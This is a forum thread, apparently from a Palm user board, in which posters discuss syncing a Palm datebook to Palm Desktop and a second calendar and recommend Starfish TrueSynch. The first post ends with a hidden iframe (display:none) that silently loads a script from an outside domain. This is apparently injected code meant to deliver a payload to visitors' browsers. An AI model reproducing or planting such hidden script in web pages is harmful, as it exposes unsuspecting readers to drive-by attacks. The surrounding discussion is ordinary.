+ Reply to Thread

Duplicate Conduits

Hi-
    I would like to have my Palm datebook to sync to two different calendars (Palm Desktop and another of my choice). Can I set-up the syncing so that the info is placed in both places. So far when I want to use another calendar program that conduit replaces the original datebook conduit to the Desktop program.
    Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

you can only do it if it is on two different machines. One conduit per machine.
    The one who dies with the most toys WINS :-)

Starfish Truesynch can do this, but I don't know if you can still get a copy without a Motorola phone. Laplink sells it, but it seems to have less calendar options then the Motorola version.

Basically, it synchs any number of different products with each other. I use it to synch my Outlook Calendar and one catogory of contacts with my Palm desktop and Motorola StarTac (StarTac just gets the contact updates, Palm Desktop and Outlook share both the contacts and the calendar). You can choose which devices synch two ways, which ones only synch one way, and which ones to skip.

It can also sync directly to the Palm, instead of or as well as the Palm Desktop, but I didn't like something about that (it has been a while since I disabled that feature, I think it was just that it was very slow..)

Alan

Thanks for info.
    All I'm trying to do is to feed 2 calendars (Palm desktop and any other) that are on my computer each time I do a sync from my 6035.
    I would like to do some fancier calendars without loosing the Palm desktop ability.

What is the "other" calendar. I can check TrueSynch to see if it is supported.

Dunno. Something like Calendar Creator. Am I going about this the wrong way?
    I just want to make a better looking calendar than the dry one you get from Palm Desktop (but still retain Palm Desktop calendar).

I doubt you will find anything to synch with Calendar Creator. You will need to find a PIM that you like. Truesynch purchased from Laplink can synch with Outlook and I think Lotus Notes. The older Motorolla version that I have can also synch with Act!, several versions of Organizer and it's own calendar program.

After I get my 7135, and no longer need TrueSynch for my StarTac, I may be willing to sell my TrueSynch CD for a very reasonable cost (what does it cost to mail a CD, 40 cents?)

Alan

Thanks
    I may take you up on that.